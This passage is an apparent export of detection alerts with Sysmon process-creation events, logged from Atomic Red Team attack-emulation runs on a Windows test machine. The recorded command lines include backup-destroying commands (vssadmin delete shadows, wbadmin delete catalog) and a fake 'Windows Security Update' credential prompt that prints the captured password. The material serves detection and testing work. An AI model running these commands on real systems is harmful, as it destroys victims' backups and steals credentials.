</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547666.302556,2019-07-19T18:47:46.302556+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:46.112439Z"">
</TimeCreated>
<EventRecordID>3645</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:46.104</Data>
<Data Name=""ProcessGuid"">747F3D96-D812-5D31-0000-0010AC892B00</Data>
<Data Name=""ProcessId"">2948</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1553037538.288766,2019-03-20T03:18:58.288766+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c msg * &quot;hello from run key&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T23:18:58.278752Z"">
</TimeCreated>
<EventRecordID>1966704</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""988"" ThreadID=""1644"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 23:18:42.516</Data>
<Data Name=""ProcessGuid"">365ABB72-78D2-5C91-0000-0010D8A50200</Data>
<Data Name=""ProcessId"">2572</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c msg * &quot;hello from run key&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-77C4-5C91-0000-0020AD7D0100</Data>
<Data Name=""LogonId"">0x17dad</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-785E-5C91-0000-00103FEA0100</Data>
<Data Name=""ParentProcessId"">1928</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547665.624944,2019-07-19T18:47:45.624944+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wbadmin.exe delete catalog -quiet&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:45.585327Z"">
</TimeCreated>
<EventRecordID>3641</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:45.569</Data>
<Data Name=""ProcessGuid"">747F3D96-D811-5D31-0000-001000632B00</Data>
<Data Name=""ProcessId"">4500</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;wbadmin.exe delete catalog -quiet&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547665.585327,2019-07-19T18:47:45.585327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:40.863055Z"">
</TimeCreated>
<EventRecordID>3640</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:40.849</Data>
<Data Name=""ProcessGuid"">747F3D96-D80C-5D31-0000-001005542B00</Data>
<Data Name=""ProcessId"">1348</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547660.70604,2019-07-19T18:47:40.706040+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;vssadmin.exe delete shadows /all /quiet&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:40.691438Z"">
</TimeCreated>
<EventRecordID>3638</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:40.568</Data>
<Data Name=""ProcessGuid"">747F3D96-D80C-5D31-0000-0010223C2B00</Data>
<Data Name=""ProcessId"">6896</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;vssadmin.exe delete shadows /all /quiet&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547660.691438,2019-07-19T18:47:40.691438+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:37.215704Z"">
</TimeCreated>
<EventRecordID>3637</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:37.170</Data>
<Data Name=""ProcessGuid"">747F3D96-D809-5D31-0000-001072292B00</Data>
<Data Name=""ProcessId"">980</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547657.127263,2019-07-19T18:47:37.127263+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:47:37.096237Z"">
</TimeCreated>
<EventRecordID>3633</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:47:37.083</Data>
<Data Name=""ProcessGuid"">747F3D96-D809-5D31-0000-00100A242B00</Data>
<Data Name=""ProcessId"">3968</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg.exe import c:\AtomicRedTeam\atomics\T1103\T1103.reg&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,PromptForCredential,powershell,PromptForCredential) in event with Command Line (powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot;) in directory : ( C:\AtomicRedTeam\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:46:51.957887Z"">
</TimeCreated>
<EventRecordID>3631</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:46:51.935</Data>
<Data Name=""ProcessGuid"">747F3D96-D7DB-5D31-0000-0010B5A82A00</Data>
<Data Name=""ProcessId"">4452</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D7DB-5D31-0000-001089A52A00</Data>
<Data Name=""ParentProcessId"">4256</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:46:51.957887Z"">
</TimeCreated>
<EventRecordID>3631</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:46:51.935</Data>
<Data Name=""ProcessGuid"">747F3D96-D7DB-5D31-0000-0010B5A82A00</Data>
<Data Name=""ProcessId"">4452</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D7DB-5D31-0000-001089A52A00</Data>
<Data Name=""ParentProcessId"">4256</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547611.957887,2019-07-19T18:46:51.957887+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:46:51.883827Z"">
</TimeCreated>
<EventRecordID>3630</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:46:51.871</Data>
<Data Name=""ProcessGuid"">747F3D96-D7DB-5D31-0000-001089A52A00</Data>
<Data Name=""ProcessId"">4256</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential(&apos;Windows Security Update&apos;, &apos;&apos;,[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
